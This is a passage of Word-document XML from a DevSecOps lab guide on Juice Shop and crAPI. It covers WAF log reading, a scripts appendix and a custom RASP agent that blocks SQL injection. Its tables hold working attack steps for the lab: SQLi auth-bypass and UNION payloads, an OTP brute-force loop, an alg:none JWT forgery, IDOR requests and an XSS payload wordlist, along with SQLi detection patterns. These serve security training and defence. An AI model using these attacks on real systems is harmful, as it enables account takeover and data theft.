        <w:spacing w:before="240" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E75B6"/>
        </w:rPr>
        <w:t>4.5.6  Read WAF Logs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="595959"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  Terminal  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
        <w:spacing w:before="0" w:after="120"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>docker compose logs waf --tail=10</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:after="120"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="595959"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ModSecurity: Access denied with code 403 (phase 2).</w:t>
        <w:br/>
        <w:t>Rule 942100: SQL Injection Attack Detected via libinjection (score: +5)</w:t>
        <w:br/>
        <w:t>Rule 942270: union.*?select.*?from matched (score: +5)</w:t>
        <w:br/>
        <w:t>Rule 949110: Inbound Anomaly Score Exceeded (Total Score: 15 &gt;= threshold 5) -&gt; BLOCK</w:t>
      </w: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Quick Reference — All Key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-d -p 3000:3000 bkimminich/juice-shop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Juice Shop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bandit -r . -f txt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Python SAST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semgrep --config=auto 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Multi-lang SAST scan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image bkimminich/juice-shop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Container SCA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osv-scanner -r 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OSV SCA scan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ghcr.io/zaproxy/zaproxy:stable zap-baseline.py -t &lt;url&gt;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ZAP passive scan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up -d  (module-3.5-api-security/)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crAPI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.../identity/api/v2/vehicle/&lt;uuid&gt;/location -H 'Bearer $TOKEN2'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BOLA test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for otp in $(seq -w 0000 9999); do ... /v2/check-otp ...; done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OTP brute force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python3 -c '...alg:none JWT...' | curl dashboard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JWT alg:none bypass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POST /rest/user/login  {email:"' OR 1=1--"}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SQLi auth bypass (Burp)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GET /rest/products/search?q='))UNION SELECT id,email,...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UNION extraction (Burp)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-o ~/XSS-payloads.txt .../robot-friendly/XSS-Jhaddix.txt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Download XSS wordlist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PUT /rest/products/1/reviews  {message:&lt;xss-payload&gt;}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Stored XSS (Burp)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GET /rest/basket/2  (while authed as user 1)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IDOR basket access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up -d  (module-4.5-rasp/)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WAF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-w "%{http_code}" http://localhost:3001/...?q=UNION+SELECT...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Test WAF blocking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logs waf --tail=20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Read WAF block logs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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All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git add &lt;paths&gt; &amp;&amp; git commit -m 'msg' &amp;&amp; git push origin main</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3120"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F0F4F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Push to GitHub</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="24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2E75B6"/>
        </w:rPr>
        <w:t>All Roadblocks &amp; Fixes —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Roadblock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M2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git add fails — 'pathspec did not match'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cd to repo root first. Read paths from git status.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ZAP Docker: localhost unreachable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host.docker.internal:3000 not localhost:3000.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ZAP Docker full scan crashes (arm64)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ZAP GUI natively — arm64 Firefox issue.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M3.5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BOLA returns 404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/identity/api/v2/vehicle/{uuid}/location.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M3.5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curl 401 despite valid token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Backslash line continuation drops header. Run as single line.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Firefox not intercepting localhost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Remove localhost/127.0.0.1 from 'No proxy for:' field.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 History shows no POST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Angular SPA uses XHR. Build requests manually in Repeater.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408 Request Timeout in Repeater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Press Enter twice after last header (HTTP/1.1 blank line rule).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Burp target: 'Invalid host: localhost:3000'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Host=localhost, Port=3000, uncheck HTTPS.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XSS wordlist curl returns 14 bytes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File moved to Fuzzing/XSS/robot-friendly/XSS-Jhaddix.txt.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Reviews endpoint 500 error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Use PUT not POST for /rest/products/{id}/reviews.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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401 Unauthorized: invalid signature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3120"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF8F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JWT expired. Re-run login to get fresh token.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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C00000"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>M4.5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Port 3000 already allocated</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3120"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF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375623"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Remove juice-shop from compose. Point BACKEND to host.docker.internal:3000.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="240"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="320" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1F3864"/>
        </w:rPr>
        <w:t>Appendix — Scripts Reference</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Every bash snippet, Python one-liner, and shell loop used in this lab — with a plain-English explanation of what it does, why it works, and what to check if it fails.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"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Script / Command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Why / How it works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-d -p 3000:3000 --name juice-shop bkimminich/juice-shop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Start Juice Shop container in detached mode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-d runs in background. -p 3000:3000 maps host port to container port. --name gives it a label for docker ps/stop/logs.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ps | grep juice-shop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Verify container is running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docker ps lists all running containers. grep filters to just the juice-shop line. If empty, the container crashed — run docker logs juice-shop.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bandit -r . -f txt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Bandit Python SAST scan recursively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-r scans all .py files recursively from current directory. -f txt prints human-readable output. Use -f json -o report.json to save machine-readable results.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semgrep --config=auto . --json -o semgrep-report.json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Semgrep with auto-selected rules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--config=auto downloads rules matched to detected languages. --json -o saves structured output. Semgrep does taint analysis — it follows data from source (user input) to sink (dangerous function).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image bkimminich/juice-shop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Scan Docker image for CVEs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Trivy pulls the image layers and checks every installed package against the NVD, GHSA, and OS advisory databases. Also detects secrets embedded in image layers.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trivy fs --scanners vuln .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Scan filesystem for dependency CVEs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--scanners vuln limits to vulnerability scanning (not secrets/misconfig). Reads requirements.txt, package.json, go.sum etc. and checks pinned versions against CVE databases.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M2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osv-scanner -r .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OSV Scanner for dependency vulnerabilities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-r scans recursively. Checks against the OSV database (open-source vulnerability DB maintained by Google). Catches PYSEC records not in Trivy's feed — run both for maximum coverage.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run --rm -v /tmp/zap-reports:/zap/wrk:rw ghcr.io/zaproxy/zaproxy:stable zap-baseline.py -t http://host.docker.internal:3000 -r zap-report.html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ZAP baseline (passive) scan via Docker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--rm removes the container after it exits. -v mounts a local folder so the report file survives. zap-baseline.py runs the passive spider — no attack payloads. host.docker.internal resolves to the Mac host from inside Docker.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export TOKEN1=$(curl -s -X POST .../login -H 'Content-Type: application/json' -d '{...}' | python3 -c "import sys,json; print(json.load(sys.stdin)['token'])")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Login and store JWT token as shell variable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Pipes the login response to python3 which parses JSON and prints just the token value. export makes it available in subsequent curl commands as $TOKEN1.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for otp in $(seq -w 0000 9999); do</w:t>
              <w:br/>
              <w:t xml:space="preserve">  result=$(curl ...check-otp... -d "{\"otp\":\"$otp\"}");</w:t>
              <w:br/>
              <w:t xml:space="preserve">  echo "$result" | grep -q 'Invalid OTP' || { echo "HIT: $otp"; break; }</w:t>
              <w:br/>
              <w:t>done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Bash loop to brute-force a 4-digit OTP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seq -w 0000 9999 generates zero-padded numbers 0000-9999. Each iteration sends a POST with the current OTP. grep -q 'Invalid OTP' exits 0 if found, 1 if not. || runs the right side when grep exits 1 (OTP valid). break stops the loop.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M3.5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python3 -c "import json,base64; h=json.dumps({'alg':'none'},...); p=json.dumps({'sub':'victim@...'},...); print(f'{b64u(h)}.{b64u(p)}.')"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Forge a JWT token with alg:none (no signature)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 JWT has three base64url-encoded parts: header.payload.signature. Setting alg:none means no signature is required. The trailing dot represents an empty signature. If the server accepts alg:none tokens, any user can impersonate any other user.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-o ~/XSS-payloads.txt 'https://raw.githubusercontent.com/danielmiessler/SecLists/master/Fuzzing/XSS/robot-friendly/XSS-Jhaddix.txt'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Download XSS wordlist from SecLists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-o saves output to a file instead of printing to terminal. The robot-friendly variant has one payload per line with no comments — ideal for Burp Intruder's Simple List payload type.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Burp Intruder: §test§ position + Load ~/XSS-payloads.txt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Fuzz the message field with all XSS payloads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§ markers define where Burp inserts each payload. Sniper attack type replaces one position at a time. Burp CE throttles to ~1 req/sec — acceptable for learning. Watch for 201 responses meaning payload was stored.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curl -s -o /dev/null -w "%{http_code}" "http://localhost:3001/...?q=UNION+SELECT..."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Send attack and print only the HTTP status code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-s suppresses progress output. -o /dev/null discards the body. -w "%{http_code}" prints just the status code. 403 = WAF blocked. 200 = passed through to Juice Shop. 000 = connection failed.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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2E75B6"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>M4.5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ourier New" w:hAnsi="Courier New"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>docker compose logs waf --tail=20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Read last 20 lines of WAF container logs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2340"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F8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--tail=20 limits output. ModSecurity logs include: the matched rule ID, the matched data, the anomaly score contribution, and the client IP + URI. Use this to understand exactly which CRS rule triggered.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="400"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="595959"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>DevSecOps &amp; AI Security Lab  |  Modules 1-4.5  |  Repo: https://github.com/akhil65/DSO</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
        <w:jc w:val="center"/>
        <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>MODULE 4.6 — RUNTIME APPLICATION SELF-PROTECTION (RASP)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1F3864"/>
        </w:rPr>
        <w:t>Overview</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>RASP (Runtime Application Self-Protection) instruments the application from within. Unlike a WAF which sits outside as a reverse proxy, a RASP agent runs inside the Node.js process and patches internal modules — so it sees decoded, deserialized data at the function-call level. Encoding tricks that might bypass a WAF are irrelevant because RASP hooks sqlite3/Sequelize after all HTTP decoding has already happened.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E75B6"/>
        </w:rPr>
        <w:t>WAF vs RASP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/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>WAF (Module 4.5)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/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>RASP (Module 4.6)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Position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External reverse proxy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Inside Node.js process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What it sees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Raw HTTP (before URL-decode)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Final SQL string at Sequelize.query()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Encoding bypass risk</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="312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C00000"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Higher — double-encode may evade CRS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="312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375623"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Lower — sees decoded data always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Business logic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Cannot detect IDOR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Can check session/ownership context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Deployment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docker compose + BACKEND env var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200" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Dockerfile + NODE_OPTIONS --require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Exercise 4.6.1 — Deploy Custom RASP Agent</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Goal: Inject rasp-hook.js into Juice Shop via a multi-stage Dockerfile and NODE_OPTIONS --require. The hook patches Sequelize.query() and sqlite3 Database methods at require() time — before any app code runs.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2CC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="8640" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:color="BF8F00"/>
              <w:left w:val="single" w:sz="4" w:color="BF8F00"/>
              <w:bottom w:val="single" w:sz="4" w:color="BF8F00"/>
              <w:right w:val="single" w:sz="4" w:color="BF8F00"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="BF8F00"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">KEY INSIGHT: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>The official Juice Shop image is distroless (no /bin/sh, no package manager). RUN npm install fails. Solution: two-stage build — Stage 1 uses node:20-alpine to prepare the hook file; Stage 2 COPYs it into the Juice Shop image with --chmod=644 (required because Juice Shop runs as uid 65532/nobody).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1E1E"/>
            <w:tcMar>
              <w:top w:w="120" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
              <w:left w:w="160" w:type="dxa"/>
              <w:right w:w="160" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="8640" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>cd module-4.6-rasp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Build the RASP-instrumented image (two-stage Dockerfile)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--profile openrasp build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Start it on port 3002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--profile openrasp up -d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sleep 20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# Verify agent loaded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logs juice-shop-rasp | grep -i rasp</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Expected startup log (confirmed):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W w:w="8640" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:color="375623"/>
              <w:left w:val="single" w:sz="4" w:color="375623"/>
              <w:bottom w:val="single" w:sz="4" w:color="375623"/>
              <w:right w:val="single" w:sz="4" w:color="375623"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="375623"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">[RASP] Agent initialized: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="375623"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>hooks: SQLi (sqlite3 + Sequelize), XSS response scan</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="375623"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">[RASP] NODE_OPTIONS --require: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="375623"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>loaded rasp-hook.js before app startup</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="375623"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">[RASP] Sequelize query hook active: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="375623"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="375623"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">[RASP] sqlite3 hooks active: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="375623"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>SQLi detection enabled</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="375623"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">info:: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="375623"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Server listening on port 3000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Exercise 4.6.2 — Verify SQLi Blocked at Runtime</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Goal: Confirm that SQL injection payloads are blocked at the database driver level, and that clean searches pass through unaffected.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1E1E"/>
            <w:tcMar>
              <w:top w:w="120" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
              <w:left w:w="160" w:type="dxa"/>
              <w:right w:w="160" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="8640" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t># Three attack payloads + one clean search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'( payload:       %{http_code}\n" "http://localhost:3002/rest/products/search?q=%27%28"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OR 1=1 payload:  %{http_code}\n" "http://localhost:3002/rest/products/search?q=%27+OR+1%3D1--"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UNION SELECT:     %{http_code}\n" "http://localhost:3002/rest/products/search?q=test+UNION+SELECT+1,2,3--"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curl -s -o /dev/null -w "RASP clean search:    %{http_code}\n" "http://localhost:3002/rest/products/search?q=apple"</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>docker compose logs juice-shop-rasp | grep "BLOCKED"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Confirmed results: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FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Port 3000 Direct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FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Port 3002 RASP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/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>BLOCKED log evidence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'( syntax break (%27%28)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LIKE '%'(%' pattern matched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' OR 1=1-- auth bypass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-- comment pattern matched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test UNION SELECT 1,2,3--</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2340"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FCE4D6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C00000"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>200 VULNERABLE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/>
                <w:color w:val="375623"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>403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union.*select + -- matched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600" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>apple (clean search)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 w:val="0"/>
                <w:color w:val="375623"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>200 OK</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2340"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E2EFDA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1600" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:color w:val="375623"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>200 OK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No pattern matched — passes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Roadblocks Encountered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/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Roadblock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2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@baidu/openrasp install fails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Distroless image: no shell, no build tools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Replaced with custom rasp-hook.js + multi-stage build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EACCES permission denied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Juice Shop runs as uid 65532 (nobody)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COPY --chmod=644 in Dockerfile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RASP blocks CREATE TABLE at startup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Broad LIKE pattern matches DEFAULT '' in DDL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isDdl() guard — skips all DDL statements</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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Background queries false-positive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LIKE '%x%' space after quote matched broad regex</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="312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Precise /LIKE '%'[^%']/ — fires only on injected quote after %</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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400" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Regex pattern commented out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800" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Formatter merged comment + regex onto one line</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="312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4160" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Ensured regex is on its own separate line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color w:val="1F3864"/>
        </w:rPr>
        <w:t>Scripts Reference — Module 4.6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/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Script / Command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340"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864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/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Why / How it works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docker compose --profile openrasp build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Build Juice Shop image with RASP agent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Multi-stage: node:20-alpine prepares rasp-hook.js; Juice Shop distroless final stage receives it via COPY --chmod=644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NODE_OPTIONS=--require /juice-shop/rasp-hook.js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Inject RASP hook before app starts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Node.js loads the --require file before app.js. Module._load and Module.prototype.require are patched to intercept sqlite3 and sequelize modules at require() time.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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docker compose logs juice-shop-rasp | grep BLOCKED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Show all RASP block events</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2340"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F8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Each BLOCKED line includes the full SQL string intercepted at Sequelize.query(). Confirms the query never reached the SQLite driver.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700" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>M4.6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000" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>curl -s -o /dev/null -w "%{http_code}" http://localhost:3002/...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2200" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Test attack payload against RASP-protected instance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tcW w:w="3140" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>-o /dev/null discards body; -w prints HTTP status. 403 = RASP threw error before query ran. 200 = no pattern matched (clean). 000 = container not running.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="595959"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>DevSecOps &amp; AI Security Lab  |  Modules 1-4.6  |  Repo: https://github.com/akhil65/DSO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